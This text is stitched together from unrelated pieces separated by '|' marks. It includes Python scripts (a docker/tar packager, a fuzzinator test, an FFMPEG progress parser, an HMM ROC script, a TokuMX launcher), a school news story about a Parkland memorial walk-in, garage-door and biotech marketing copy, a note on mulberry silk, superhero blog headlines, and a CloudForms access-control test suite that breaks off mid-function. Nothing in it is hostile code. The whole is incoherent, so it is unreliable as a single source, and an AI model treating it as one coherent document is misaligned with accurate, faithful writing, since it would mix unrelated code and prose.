subprocess.check_call(['docker', 'run', '--volume', '%s:/IN' % input_dir,
'--volume', '%s:/OUT' % temp_out,
DOCKER_IMAGE, DOCKER_SCRIPT,
'--library', '/IN/%s' % input_base,
'--destdir', '/OUT'])
subprocess.check_call(['tar', '--directory=%s' % temp_out, '-zcf',
'%s/%s_tree.tar.gz' % (out_dir, input_base),
'.'])
if __name__ == '__main__':
main()
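The path handling in `main()` can be sketched in isolation; the input path below is illustrative:

```python
import os

# How the script derives the docker volume paths and the output archive
# name from its input argument.
input_file = '/out/Release/skottie_tool'
input_base = os.path.basename(input_file)   # file name only
input_dir = os.path.dirname(input_file)     # directory mounted as /IN
archive = '%s_tree.tar.gz' % input_base     # name of the tarball written to out_dir
print(input_base, input_dir, archive)
# skottie_tool /out/Release skottie_tool_tree.tar.gz
```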
|
One month after the tragic Parkland shooting, students at Grand Haven and nationwide continued to foster conversation about school safety, bullying and guns while also honoring the 17 lives lost with walk-ins and walkouts.
Organized by freshman Lexi Tater, junior Faith Stevens, sophomore Jackson Schulte and junior Katie Pease with the help of the administration, a short slide show was presented in classes and then students were allowed to walk to the gym to participate in a moment of silence. The presentation stated that the goal of the walk-in was to remember the Parkland shooting as well as encourage students to be more aware of bullying and the importance of a secure building.
The four student organizers give a small speech before the moment of silence in the field house.
“I feel like it went super well, I’m really glad everyone came and supported each other,” Pease said.
According to the Grand Haven Twitter account, about 1,000 students were in attendance in the field house.
While the event inside occurred, around 100 students stood outside by the flagpoles in silence, also in remembrance of the Parkland victims.
Some students chose to walk out because of the structured organization of the walk-in, stating that unity with the rest of the nation is important.
Safety was the main factor that led the organizers to choose a walk-in over a walkout. According to Tater and Principal Tracy Wilson, dangers from cars driving in the parking lot, a lack of control of students and the fear of a potential copycat moved the moment of remembrance from outside to in.
The organizers also stated that they wanted to reflect on the tragedy by focusing on respecting one another and on the responsibility of students to close doors and enter through the main office, rather than on gun control.
“I understand that it’s not what the rest of the country is doing but we wanted to give the students an option that wasn’t political,” Pease said.
Another concern surrounding the walkout was attendance, with some speculating that students would exit the school and leave campus, using the event to get out of class. However, students who participated outside say that the walkout was orderly and no one left school grounds.
Despite the students being split on both their end goals and their method of spreading awareness, both groups were praised by administration for being respectful and active.
|
# Copyright (c) 2016-2018 Renata Hodovan, Akos Kiss.
#
# Licensed under the BSD 3-Clause License
# <LICENSE.rst or https://opensource.org/licenses/BSD-3-Clause>.
# This file may not be copied, modified, or distributed except
# according to those terms.
import os
import pytest
import sys
import fuzzinator
from common_call import blinesep, resources_dir
@pytest.mark.parametrize('command, cwd, env, no_exit_code, test, exp', [
('%s %s --print-args {test}' % (sys.executable, os.path.join(resources_dir, 'mock_tool.py')), None, None, None, 'foo', fuzzinator.call.NonIssue({'stdout': b'foo' + blinesep, 'stderr': b'', 'exit_code': 0})),
('%s %s --print-args --exit-code 1 {test}' % (sys.executable, os.path.join(resources_dir, 'mock_tool.py')), None, None, None, 'foo', {'stdout': b'foo' + blinesep, 'stderr': b'', 'exit_code': 1}),
('%s %s --print-args --to-stderr --exit-code 1 {test}' % (sys.executable, os.path.join(resources_dir, 'mock_tool.py')), None, None, None, 'foo', {'stdout': b'', 'stderr': b'foo' + blinesep, 'exit_code': 1}),
('%s %s --print-args --exit-code 1 {test}' % (sys.executable, os.path.join('.', 'mock_tool.py')), resources_dir, None, None, 'foo', {'stdout': b'foo' + blinesep, 'stderr': b'', 'exit_code': 1}),
('%s %s --print-env BAR --print-args --exit-code 1 {test}' % (sys.executable, os.path.join('.', 'mock_tool.py')), resources_dir, '{"BAR": "baz"}', None, 'foo', {'stdout': b'foo' + blinesep + b'baz' + blinesep, 'stderr': b'', 'exit_code': 1}),
('%s %s --print-args --exit-code 0 {test}' % (sys.executable, os.path.join(resources_dir, 'mock_tool.py')), None, None, 'True', 'foo', {'stdout': b'foo' + blinesep, 'stderr': b'', 'exit_code': 0}),
])
def test_subprocess_call(command, cwd, env, no_exit_code, test, exp):
assert fuzzinator.call.SubprocessCall(command, cwd=cwd, env=env, no_exit_code=no_exit_code, test=test) == exp
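What `SubprocessCall` asserts in each case above can be sketched with the standard library alone; `subprocess.run` here is a stand-in for fuzzinator's internals, not its actual implementation:

```python
import subprocess
import sys

# Run a small command and collect its stdout and exit code, the same three
# fields the expected dicts above are built from.
proc = subprocess.run([sys.executable, '-c', 'print("foo")'],
                      capture_output=True)
print(proc.returncode)               # 0
print(proc.stdout.decode().strip())  # foo
```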
|
Seeking specialists for garage door weatherstripping in Abbotsford, British Columbia? You can always contact our local company. We are here to sort out such concerns and handle weather seal problems. When yours get torn or worn, call us to replace them. Equipped well and experienced with all types of weather strips, our pros can replace yours with accuracy. We are careful when we remove the existing seals and accurate when we install the new ones. No matter which door you have and which astragal you want, leave such services to us. Our pros at Garage Doors Abbotsford are skilled and committed.
With correct garage door weatherstripping installation, you get all the benefits seals offer and save money. Leave the service to our experts. We have been installing weather seals on all garage doors in Abbotsford for a long time. Our techs are familiar with all types, brands, and styles. Whether you want to install a retainer or a conventional rubber astragal, we are here to offer advice and the required service.
Why is it important to install weather seals correctly? Weatherstripping the garage door bottom, sides, and top is the ultimate solution for enhancing indoor insulation. With the weather seal properly installed, you weatherize your garage and protect it from cold air drafts in the winter and heat waves in the summer. You also keep out unwanted visitors, like insects and rainwater.
With experience in garage door weatherstripping repair, we can assure you that the seals also protect the door. They provide the necessary layer to protect the material when the door is closed down. The seals cover the gap between the door and the jamb and enable the door to close and move well. So trust us to fix them up. When they are worn, they must be replaced quickly. And our company guarantees expert service in a timely and affordable fashion.
Don’t hesitate to contact us for our quotes or to set an appointment for garage door weatherstripping Abbotsford service. We will be glad to offer assistance.
|
import re
import six
from smartfields.processors.base import ExternalFileProcessor
from smartfields.utils import ProcessingError
from smartfields.processors.mixin import CloudExternalFileProcessorMixin
__all__ = [
    'FFMPEGProcessor', 'CloudFFMPEGProcessor'
]


class FFMPEGProcessor(ExternalFileProcessor):
    duration_re = re.compile(r'Duration: (?P<hours>\d+):(?P<minutes>\d+):(?P<seconds>\d+)')
    progress_re = re.compile(r'time=(?P<hours>\d+):(?P<minutes>\d+):(?P<seconds>\d+)')
    error_re = re.compile(r'Invalid data found when processing input')
    cmd_template = "ffmpeg -i {input} -y -codec:v {vcodec} -b:v {vbitrate} " \
                   "-maxrate {maxrate} -bufsize {bufsize} -vf " \
                   "scale={width}:{height} -threads {threads} -c:a {acodec} {output}"

    def stdout_handler(self, line, duration=None):
        if duration is None:
            duration_time = self.duration_re.search(line)
            if duration_time:
                duration = self.timedict_to_seconds(duration_time.groupdict())
        elif duration != 0:
            current_time = self.progress_re.search(line)
            if current_time:
                seconds = self.timedict_to_seconds(current_time.groupdict())
                progress = float(seconds) / duration
                progress = progress if progress < 1 else 0.99
                self.set_progress(progress)
            elif self.error_re.search(line):
                raise ProcessingError("Invalid video file or unknown video format.")
        return (duration,)

    def timedict_to_seconds(self, timedict):
        seconds = 0
        for key, t in six.iteritems(timedict):
            if key == 'seconds':
                seconds += int(t)
            elif key == 'minutes':
                seconds += int(t) * 60
            elif key == 'hours':
                seconds += int(t) * 3600
        return seconds


class CloudFFMPEGProcessor(CloudExternalFileProcessorMixin, FFMPEGProcessor):
    pass
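As a standalone sketch, the progress computation reduces to applying the two regexes to ffmpeg's log output and dividing elapsed time by total duration (the sample log lines below are made up):

```python
import re

# The same Duration/time patterns FFMPEGProcessor uses on ffmpeg's stderr.
duration_re = re.compile(r'Duration: (?P<hours>\d+):(?P<minutes>\d+):(?P<seconds>\d+)')
progress_re = re.compile(r'time=(?P<hours>\d+):(?P<minutes>\d+):(?P<seconds>\d+)')

def to_seconds(d):
    return int(d['hours']) * 3600 + int(d['minutes']) * 60 + int(d['seconds'])

duration = to_seconds(duration_re.search(
    "  Duration: 00:02:30.00, start: 0.000000, bitrate: 1205 kb/s").groupdict())
elapsed = to_seconds(progress_re.search(
    "frame= 1800 fps= 48 q=28.0 size= 2048kB time=00:01:15.02 bitrate=1118.6kbits/s").groupdict())
print(elapsed / duration)  # 0.5
```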
|
Mulberry silks create a beautiful sheen when laid on wool in your wet felting. They can also be used for your needle felting projects.
Mulberry silk is created by feeding mulberry leaves to domesticated silkworms (Bombyx mori).
These in turn produce cocoons consisting of pure white silk fibres.
In China, the commercial silk industry is underpinned by millions of small farmers and individual families hand-feeding mulberry leaves to these caterpillars in boxes in their homes. They then sell the cocoons to silk manufacturers.
|
#!/usr/bin/env python
import sys, math
# add parent directory to import path
sys.path.append("..")
import mallet.viterbi as viterbi
import mallet.input.sequence_parser as seq_parser
import mallet.input.tgf_parser as tgf_parser
import mallet.safe_math as safe_math
STEPS = 100
def frange(start, end, step):
end += step # HACK: prevent floating point errors in end
current = start
while current <= end:
yield current
current += step
def float_floor(value, decimals = 1):
value = value*(10**decimals)
return math.floor(value)/(10**decimals)
def float_ceil(value, decimals = 1):
value = value*(10**decimals)
return math.ceil(value)/(10**decimals)
def evaluate_alignment(alignment):
return (alignment, alignment.state_path.sequence[50] == "*")
def accuracy_metrics(evaluated_alignments, threshold):
tp, tn, fp, fn = (0,0,0,0)
for alignment,is_correct in evaluated_alignments:
if alignment.score >= threshold:
if is_correct:
tp += 1
else:
fp += 1
else:
if is_correct:
fn += 1
else:
tn += 1
return (tp, tn, fp, fn)
def print_roc_data_in_tsv(roc_data):
    print("score\ttpr\tfpr\tppv\ttp\ttn\tfp\tfn")
    for score, metrics in sorted(roc_data.items()):
        print("{:.4f}\t{:.4f}\t{:.4f}\t{:.4f}\t{}\t{}\t{}\t{}".format(score, *metrics))
hmm = tgf_parser.parse(sys.argv[1])
sequences = seq_parser.parse(sys.argv[2])
alignments = viterbi.viterbi_all(hmm, sequences)
evaluated_alignments = list(map(evaluate_alignment, alignments))
max_score = max(alignments, key = lambda align: align.score).score
min_score = min(alignments, key = lambda align: align.score).score
roc_data = {}
step_size = (max_score - min_score)/STEPS
scores_iterator = frange(float_floor(min_score), float_ceil(max_score), step_size)
for score in scores_iterator:
tp, tn, fp, fn = accuracy_metrics(evaluated_alignments, score)
tpr = safe_math.div(float(tp), float(tp+fn))
fpr = safe_math.div(float(fp), float(fp+tn))
ppv = safe_math.div(float(tp), float(tp+fp))
roc_data[score] = (tpr, fpr, ppv, tp, tn, fp, fn)
print_roc_data_in_tsv(roc_data)
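The confusion-matrix counting in `accuracy_metrics` can be exercised on its own with made-up (score, is_correct) pairs:

```python
def accuracy_metrics(evaluated, threshold):
    # Count true/false positives and negatives for alignments scored
    # against a classification threshold.
    tp = tn = fp = fn = 0
    for score, is_correct in evaluated:
        if score >= threshold:
            if is_correct:
                tp += 1
            else:
                fp += 1
        elif is_correct:
            fn += 1
        else:
            tn += 1
    return tp, tn, fp, fn

data = [(0.9, True), (0.8, False), (0.4, True), (0.2, False)]
print(accuracy_metrics(data, 0.5))  # (1, 1, 1, 1)
```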
|
HAPPY NATIONAL SUPERHERO DAY ! !
"I HAVE THE HIGH GROUND!"
"THAT WIZARD IS JUST A CRAZY OLD MAN"
TUESDAY COSPLAY: TEEN TITANS GO!
TMNT & USAGI YOJIMBO REUNITE!!
HOW LONG ARE JUGGERNAUT'S LEGS?????
ANYONE GOING TO STAR WARS CELEBRATION 2017 ? ?
HAPPY 75TH BIRTHDAY, LASSO OF TRUTH ! !
|
#!/usr/bin/python
#
# python script that deploys and runs tokumx
# arg: hostname (start|stop)
#
# NOTE
# TokuMX will not run with transparent huge pages enabled.
# To disable:
# (echo never > /sys/kernel/mm/transparent_hugepage/enabled)
import subprocess
import os
import sys
import json
import shutil
import re
import expsystem as es
mongos_port = 27017
class TokumxServer:
def __init__(self, param, host, script_home):
self.param = param
self.host = host
self.dir = es.DataRoot(param).dir('tokumx-' + es.getuser())
self.mongobin = param.get('tokumx_bin')
if (self.mongobin is None or self.mongobin == ''):
self.mongobin = os.path.join(os.path.dirname(script_home),
'tokumx', 'bin')
def install(self):
es.cleandir(self.dir)
def start(self, install = True):
if (install):
self.install()
slog = es.SysLog('tokumx')
slog.rotate(10)
subprocess.check_call("{0} --fork --dbpath {1} --logpath {2}".format(
os.path.join(self.mongobin, 'mongod'), self.dir, slog.getpath()),
shell=True)
def stop(self):
subprocess.call([os.path.join(self.mongobin, 'mongod'), '--shutdown',
'--dbpath', self.dir])
data = json.load(sys.stdin)
# argv[1] is the hostname; argv[2], if given, is the command (start|stop)
if len(sys.argv) > 2:
    cmd = sys.argv[2]
else:
    cmd = 'start'
sd = es.SysDirs()
server = TokumxServer(data, host = sys.argv[1], script_home = sd.script_home)
if (cmd == 'stop'):
server.stop()
else:
server.start()
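For illustration, the mongod command string that `start()` assembles looks like this (the paths are hypothetical):

```python
# The same template start() passes to subprocess.check_call, filled with
# example values for the binary path, data directory, and log path.
cmd = "{0} --fork --dbpath {1} --logpath {2}".format(
    "/opt/tokumx/bin/mongod",
    "/data/tokumx-myuser",
    "/var/log/tokumx.log")
print(cmd)
```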
|
For companies in the biotech or pharmaceutical industries, managed digital and I.T. services are critical to success. Effective marketing for such businesses needs to capture your company’s voice while communicating the often complex services and products you provide. On top of that, you must ensure that your network performs as optimally as possible while keeping sensitive data secure.
1SEO I.T. Support & Digital Marketing can provide you with comprehensive digital solutions that help you build your brand, safeguard your data, generate leads, and much more. Our knowledgeable teams will ensure that your company is primed for success and protected from digital threats. With 1SEO, you have everything you need to optimize your digital presence and secure your company’s most important information.
In the pharmaceutical and biotech industries, digital marketing can make or break both individual products and entire companies. Because research and development can be so costly, effective marketing becomes more essential than ever. Our talented teams remain current on the latest developments in the marketing industry to make sure that your company can benefit from the most cutting-edge marketing techniques and technologies.
We implement PPC campaigns, manage social media accounts, perform search engine optimization, design custom websites, and do anything else in our power to help your company grow. With our services, you can promote new products and services, expand your customer base, and much more. We tailor our marketing services to your business objectives so that we can help you achieve the results you want.
You want your business to be one of the top results when people are looking for your goods or services, and search engine optimization does just that. An effective SEO strategy will include an analytical approach to marketing. We utilize sophisticated industry tools and software, all to drive more traffic and leads to your site.
This marketing method yields results by reaching key target demographics through meticulous market research. A well-run PPC campaign not only attracts potential customers looking for your services or products, but also works within your budget and informs other forms of marketing.
Through the use of social media campaigns, we can help you engage with your target demographic and generate leads for your business. Utilizing compelling posts, we’ll not only provide interesting content for your audience on subjects they’re passionate about, but also offer them something of value they can share with others.
You need a website that’s fast, well-designed, and takes the end user’s experience into consideration. Not only can we provide your business with a custom-built and beautifully-designed website, but it’ll also be responsive, mobile-friendly, and easy to use.
Your company depends on efficient technology more than most. To achieve maximum productivity, your company needs an expert networking solution. Further, your data is your most valuable asset. Loss or theft of this crucial information can be catastrophic. Managed I.T. solutions for your biotech company from 1SEO can provide you with the security and optimization your company needs to perform at its highest potential.
Our I.T. specialists will implement every measure necessary to ensure the safety and effectiveness of your company.
Ready to make your company safer and more efficient than ever before? Call us at 215-946-1046 to schedule a free, one-hour consultation.
|
# -*- coding: utf-8 -*-
import fauxfactory
import pytest
import traceback
from cfme.configure.access_control import User, Group, Role, Tenant, Project
from utils import error
import cfme.fixtures.pytest_selenium as sel
from cfme import test_requirements
from cfme.base.credential import Credential
from cfme.automate.explorer import AutomateExplorer # NOQA
from cfme.base import Server
from cfme.control.explorer import ControlExplorer # NOQA
from cfme.exceptions import OptionNotAvailable
from cfme.common.provider import base_types
from cfme.infrastructure import virtual_machines as vms
from cfme.infrastructure.provider.virtualcenter import VMwareProvider
from cfme.services.myservice import MyService
from cfme.web_ui import flash, Table, InfoBlock, toolbar as tb
from cfme.configure import tasks
from fixtures.provider import setup_one_or_skip
from utils.appliance.implementations.ui import navigate_to
from utils.blockers import BZ
from utils.log import logger
from utils.providers import ProviderFilter
from utils.update import update
from utils import version
records_table = Table("//div[@id='main_div']//table")
usergrp = Group(description='EvmGroup-user')
group_table = Table("//div[@id='main_div']//table")
pytestmark = test_requirements.rbac
@pytest.fixture(scope='module')
def a_provider(request):
prov_filter = ProviderFilter(classes=[VMwareProvider])
return setup_one_or_skip(request, filters=[prov_filter])
def new_credential():
return Credential(principal='uid' + fauxfactory.gen_alphanumeric(), secret='redhat')
def new_user(group=usergrp):
return User(
name='user' + fauxfactory.gen_alphanumeric(),
credential=new_credential(),
email='xyz@redhat.com',
group=group,
cost_center='Workload',
value_assign='Database')
def new_group(role='EvmRole-approver'):
return Group(
description='grp' + fauxfactory.gen_alphanumeric(),
role=role)
def new_role():
return Role(
name='rol' + fauxfactory.gen_alphanumeric(),
vm_restriction='None')
def get_tag():
return InfoBlock('Smart Management', 'My Company Tags').text
@pytest.fixture(scope='function')
def check_item_visibility(tag):
def _check_item_visibility(item, user_restricted):
category_name = ' '.join((tag.category.display_name, '*'))
item.edit_tags(category_name, tag.display_name)
with user_restricted:
assert item.exists
item.remove_tag(category_name, tag.display_name)
with user_restricted:
assert not item.exists
return _check_item_visibility
# User test cases
@pytest.mark.tier(2)
def test_user_crud():
user = new_user()
user.create()
with update(user):
user.name = user.name + "edited"
copied_user = user.copy()
copied_user.delete()
user.delete()
# @pytest.mark.meta(blockers=[1035399]) # work around instead of skip
@pytest.mark.tier(2)
def test_user_login():
user = new_user()
user.create()
try:
with user:
navigate_to(Server, 'Dashboard')
finally:
user.appliance.server.login_admin()
@pytest.mark.tier(3)
def test_user_duplicate_name(appliance):
region = appliance.server_region
nu = new_user()
nu.create()
msg = version.pick({
version.LOWEST: "Userid has already been taken",
'5.8': "Userid is not unique within region {}".format(region)
})
with error.expected(msg):
nu.create()
group_user = Group("EvmGroup-user")
@pytest.mark.tier(3)
def test_username_required_error_validation():
user = User(
name="",
credential=new_credential(),
email='xyz@redhat.com',
group=group_user)
with error.expected("Name can't be blank"):
user.create()
@pytest.mark.tier(3)
def test_userid_required_error_validation():
user = User(
name='user' + fauxfactory.gen_alphanumeric(),
credential=Credential(principal='', secret='redhat'),
email='xyz@redhat.com',
group=group_user)
with error.expected("Userid can't be blank"):
user.create()
@pytest.mark.tier(3)
def test_user_password_required_error_validation():
user = User(
name='user' + fauxfactory.gen_alphanumeric(),
credential=Credential(principal='uid' + fauxfactory.gen_alphanumeric(), secret=None),
email='xyz@redhat.com',
group=group_user)
if version.current_version() < "5.5":
check = "Password_digest can't be blank"
else:
check = "Password can't be blank"
with error.expected(check):
user.create()
@pytest.mark.tier(3)
def test_user_group_error_validation():
user = User(
name='user' + fauxfactory.gen_alphanumeric(),
credential=new_credential(),
email='xyz@redhat.com',
group='')
with error.expected("A User must be assigned to a Group"):
user.create()
@pytest.mark.tier(3)
def test_user_email_error_validation():
user = User(
name='user' + fauxfactory.gen_alphanumeric(),
credential=new_credential(),
email='xyzdhat.com',
group=group_user)
with error.expected("Email must be a valid email address"):
user.create()
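The `error.expected(...)` context manager used throughout these tests wraps the usual try/except-and-assert pattern, sketched here with a stand-in validation function (not the real CFME API):

```python
# Stand-in validator; the message mirrors the flash message asserted in
# test_user_email_error_validation above.
def create_user(email):
    if "@" not in email:
        raise ValueError("Email must be a valid email address")

try:
    create_user("xyzdhat.com")
except ValueError as exc:
    assert "valid email address" in str(exc)
    print("expected error seen")
else:
    raise AssertionError("no error raised")
```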
@pytest.mark.tier(2)
def test_user_edit_tag():
user = new_user()
user.create()
user.edit_tags("Cost Center *", "Cost Center 001")
assert get_tag() == "Cost Center: Cost Center 001", "User edit tag failed"
user.delete()
@pytest.mark.tier(3)
def test_user_remove_tag():
user = new_user()
user.create()
user.edit_tags("Department", "Engineering")
user.remove_tag("Department", "Engineering")
navigate_to(user, 'Details')
assert get_tag() != "Department: Engineering", "Remove User tag failed"
user.delete()
@pytest.mark.tier(3)
def test_delete_default_user():
"""Test for deleting default user Administrator.
Steps:
* Login as Administrator user
* Try deleting the user
"""
user = User(name='Administrator')
navigate_to(User, 'All')
column = version.pick({version.LOWEST: "Name",
"5.4": "Full Name"})
row = records_table.find_row_by_cells({column: user.name})
sel.check(sel.element(".//input[@type='checkbox']", root=row[0]))
tb.select('Configuration', 'Delete selected Users', invokes_alert=True)
sel.handle_alert()
    flash.assert_message_match('Default EVM User "{}" cannot be deleted'.format(user.name))
@pytest.mark.tier(3)
@pytest.mark.meta(automates=[BZ(1090877)])
@pytest.mark.meta(blockers=[BZ(1408479)], forced_streams=["5.7", "upstream"])
@pytest.mark.uncollectif(lambda: version.current_version() >= "5.7")
def test_current_user_login_delete(request):
"""Test for deleting current user login.
Steps:
* Login as Admin user
* Create a new user
* Login with the new user
* Try deleting the user
"""
group_user = Group("EvmGroup-super_administrator")
user = User(
name='user' + fauxfactory.gen_alphanumeric(),
credential=new_credential(),
email='xyz@redhat.com',
group=group_user)
user.create()
request.addfinalizer(user.delete)
    request.addfinalizer(user.appliance.server.login_admin)  # pass the callable, do not call it
with user:
if version.current_version() >= '5.7':
navigate_to(user, 'Details')
menu_item = ('Configuration', 'Delete this User')
assert tb.exists(*menu_item) and tb.is_greyed(*menu_item), "Delete User is not dimmed"
else:
with error.expected("Current EVM User \"{}\" cannot be deleted".format(user.name)):
user.delete()
@pytest.mark.tier(3)
def test_tagvis_user(user_restricted, check_item_visibility):
""" Tests if group honour tag visibility feature
Prerequirement:
Catalog, tag, role, group and restricted user should be created
Steps:
1. As admin add tag to group
2. Login as restricted user, group is visible for user
3. As admin remove tag from group
4. Login as restricted user, group is not visible for user
"""
check_item_visibility(user_restricted, user_restricted)
# Group test cases
@pytest.mark.tier(2)
def test_group_crud():
group = new_group()
group.create()
with update(group):
group.description = group.description + "edited"
group.delete()
@pytest.mark.tier(2)
def test_group_crud_with_tag(a_provider, category, tag):
"""Test for verifying group create with tag defined
Steps:
* Login as Admin user
* Navigate to add group page
* Fill all fields
* Set tag
* Save group
"""
group = Group(
description='grp{}'.format(fauxfactory.gen_alphanumeric()),
role='EvmRole-approver',
tag=[category.display_name, tag.display_name],
host_cluster=[a_provider.data['name']],
vm_template=[a_provider.data['name'], a_provider.data['datacenters'][0],
'Discovered virtual machine']
)
group.create()
with update(group):
group.tag = [tag.category.display_name, tag.display_name]
group.host_cluster = [a_provider.data['name']]
group.vm_template = [a_provider.data['name'], a_provider.data['datacenters'][0],
'Discovered virtual machine']
group.delete()
@pytest.mark.tier(3)
def test_group_duplicate_name(appliance):
region = appliance.server_region
group = new_group()
group.create()
msg = version.pick({
version.LOWEST: "Description has already been taken",
'5.8': "Description is not unique within region {}".format(region)
})
with error.expected(msg):
group.create()
@pytest.mark.tier(2)
def test_group_edit_tag():
group = new_group()
group.create()
group.edit_tags("Cost Center *", "Cost Center 001")
assert get_tag() == "Cost Center: Cost Center 001", "Group edit tag failed"
group.delete()
@pytest.mark.tier(2)
def test_group_remove_tag():
group = new_group()
group.create()
navigate_to(group, 'Edit')
group.edit_tags("Department", "Engineering")
group.remove_tag("Department", "Engineering")
assert get_tag() != "Department: Engineering", "Remove Group tag failed"
group.delete()
@pytest.mark.tier(3)
def test_group_description_required_error_validation():
error_text = "Description can't be blank"
group = Group(description=None, role='EvmRole-approver')
with error.expected(error_text):
group.create()
flash.dismiss()
@pytest.mark.tier(3)
def test_delete_default_group():
flash_msg = "EVM Group \"{}\": Error during delete: A read only group cannot be deleted."
group = Group(description='EvmGroup-administrator')
view = navigate_to(Group, 'All')
row = group_table.find_row_by_cells({'Name': group.description})
sel.check(sel.element(".//input[@type='checkbox']", root=row[0]))
view.configuration.item_select('Delete selected Groups', handle_alert=True)
view.flash.assert_message(flash_msg.format(group.description))
@pytest.mark.tier(3)
def test_delete_group_with_assigned_user():
flash_msg = version.pick({
'5.6': ("EVM Group \"{}\": Error during delete: Still has users assigned"),
'5.5': ("EVM Group \"{}\": Error during \'destroy\': Still has users assigned")})
group = new_group()
group.create()
user = new_user(group=group)
user.create()
with error.expected(flash_msg.format(group.description)):
group.delete()
@pytest.mark.tier(3)
def test_edit_default_group():
flash_msg = 'Read Only EVM Group "{}" can not be edited'
group = Group(description='EvmGroup-approver')
navigate_to(Group, 'All')
row = group_table.find_row_by_cells({'Name': group.description})
sel.check(sel.element(".//input[@type='checkbox']", root=row[0]))
tb.select('Configuration', 'Edit the selected Group')
flash.assert_message_match(flash_msg.format(group.description))
@pytest.mark.tier(3)
def test_edit_sequence_usergroups(request):
"""Test for editing the sequence of user groups for LDAP lookup.
Steps:
* Login as Administrator user
* create a new group
* Edit the sequence of the new group
* Verify the changed sequence
"""
group = new_group()
group.create()
request.addfinalizer(group.delete)
view = navigate_to(Group, 'All')
row = view.table.row(name=group.description)
original_sequence = row.sequence.text
group.set_group_order(group.description)
row = view.table.row(name=group.description)
changed_sequence = row.sequence.text
assert original_sequence != changed_sequence, "Edit Sequence Failed"
@pytest.mark.tier(3)
def test_tagvis_group(user_restricted, group_with_tag, check_item_visibility):
""" Tests if group honour tag visibility feature
Prerequirement:
Catalog, tag, role, group and restricted user should be created
Steps:
1. As admin add tag to group
2. Login as restricted user, group is visible for user
3. As admin remove tag from group
4. Login as restricted user, group is not visible for user
"""
check_item_visibility(group_with_tag, user_restricted)
# Role test cases
@pytest.mark.tier(2)
def test_role_crud():
role = new_role()
role.create()
with update(role):
role.name = role.name + "edited"
copied_role = role.copy()
copied_role.delete()
role.delete()
@pytest.mark.tier(3)
def test_rolename_required_error_validation():
role = Role(
name=None,
vm_restriction='Only User Owned')
with error.expected("Name can't be blank"):
role.create()
@pytest.mark.tier(3)
def test_rolename_duplicate_validation():
role = new_role()
role.create()
with error.expected("Name has already been taken"):
role.create()
@pytest.mark.tier(3)
def test_delete_default_roles():
flash_msg = version.pick({
'5.6': ("Role \"{}\": Error during delete: Cannot delete record "
"because of dependent entitlements"),
'5.5': ("Role \"{}\": Error during \'destroy\': Cannot delete record "
"because of dependent miq_groups")})
role = Role(name='EvmRole-approver')
with error.expected(flash_msg.format(role.name)):
role.delete()
@pytest.mark.tier(3)
def test_edit_default_roles():
role = Role(name='EvmRole-auditor')
navigate_to(role, 'Edit')
    flash.assert_message_match("Read Only Role \"{}\" can not be edited".format(role.name))
@pytest.mark.tier(3)
def test_delete_roles_with_assigned_group():
flash_msg = version.pick({
'5.6': ("Role \"{}\": Error during delete: Cannot delete record "
"because of dependent entitlements"),
'5.5': ("Role \"{}\": Error during \'destroy\': Cannot delete record "
"because of dependent miq_groups")})
role = new_role()
role.create()
group = new_group(role=role.name)
group.create()
with error.expected(flash_msg.format(role.name)):
role.delete()
@pytest.mark.tier(3)
def test_assign_user_to_new_group():
role = new_role() # call function to get role
role.create()
group = new_group(role=role.name)
group.create()
user = new_user(group=group)
user.create()
def _test_vm_provision():
logger.info("Checking for provision access")
navigate_to(vms.Vm, 'VMsOnly')
vms.lcl_btn("Provision VMs")
def _test_vm_power_on():
"""Ensures power button is shown for a VM"""
logger.info("Checking for power button")
vm_name = vms.Vm.get_first_vm_title()
logger.debug("VM " + vm_name + " selected")
if not vms.is_pwr_option_visible(vm_name, option=vms.Vm.POWER_ON):
raise OptionNotAvailable("Power button does not exist")
def _test_vm_removal():
logger.info("Testing for VM removal permission")
vm_name = vms.get_first_vm()
logger.debug("VM " + vm_name + " selected")
vms.remove(vm_name, cancel=True)
@pytest.mark.tier(3)
@pytest.mark.parametrize(
'product_features, action',
[(
{version.LOWEST: [['Everything', 'Infrastructure', 'Virtual Machines', 'Accordions'],
['Everything', 'Access Rules for all Virtual Machines', 'VM Access Rules', 'Modify',
'Provision VMs']],
'5.6': [['Everything', 'Compute', 'Infrastructure', 'Virtual Machines', 'Accordions'],
['Everything', 'Access Rules for all Virtual Machines', 'VM Access Rules', 'Modify',
'Provision VMs']]},
_test_vm_provision)])
def test_permission_edit(appliance, request, product_features, action):
"""
Ensures that changes in permissions are enforced on next login
"""
product_features = version.pick(product_features)
    request.addfinalizer(appliance.server.login_admin)
role_name = fauxfactory.gen_alphanumeric()
role = Role(name=role_name,
vm_restriction=None,
product_features=[(['Everything'], False)] + # role_features
[(k, True) for k in product_features])
role.create()
group = new_group(role=role.name)
group.create()
user = new_user(group=group)
user.create()
with user:
try:
action()
except Exception:
pytest.fail('Incorrect permissions set')
appliance.server.login_admin()
role.update({'product_features': [(['Everything'], True)] +
[(k, False) for k in product_features]
})
with user:
try:
with error.expected(Exception):
action()
except error.UnexpectedSuccessException:
            pytest.fail('Permissions have not been updated')
def _mk_role(name=None, vm_restriction=None, product_features=None):
"""Create a thunk that returns a Role object to be used for perm
testing. name=None will generate a random name
"""
name = name or fauxfactory.gen_alphanumeric()
return lambda: Role(name=name,
vm_restriction=vm_restriction,
product_features=product_features)
def _go_to(cls, dest='All'):
"""Create a thunk that navigates to the given destination"""
return lambda: navigate_to(cls, dest)
cat_name = "Settings"
@pytest.mark.tier(3)
@pytest.mark.parametrize(
'role,allowed_actions,disallowed_actions',
[[_mk_role(product_features=[[['Everything'], False], # minimal permission
[['Everything', cat_name, 'Tasks'], True]]),
{'tasks': lambda: sel.click(tasks.buttons.default)}, # can only access one thing
{
'my services': _go_to(MyService),
'chargeback': _go_to(Server, 'Chargeback'),
'clouds providers': _go_to(base_types()['cloud']),
'infrastructure providers': _go_to(base_types()['infra']),
'control explorer': _go_to(Server, 'ControlExplorer'),
'automate explorer': _go_to(Server, 'AutomateExplorer')}],
[_mk_role(product_features=[[['Everything'], True]]), # full permissions
{
'my services': _go_to(MyService),
'chargeback': _go_to(Server, 'Chargeback'),
'clouds providers': _go_to(base_types()['cloud']),
'infrastructure providers': _go_to(base_types()['infra']),
'control explorer': _go_to(Server, 'ControlExplorer'),
'automate explorer': _go_to(Server, 'AutomateExplorer')},
{}]])
@pytest.mark.meta(blockers=[1262759])
def test_permissions(appliance, role, allowed_actions, disallowed_actions):
# create a user and role
role = role() # call function to get role
role.create()
group = new_group(role=role.name)
group.create()
user = new_user(group=group)
user.create()
fails = {}
try:
with user:
appliance.server.login_admin()
for name, action_thunk in allowed_actions.items():
try:
action_thunk()
except Exception:
fails[name] = "{}: {}".format(name, traceback.format_exc())
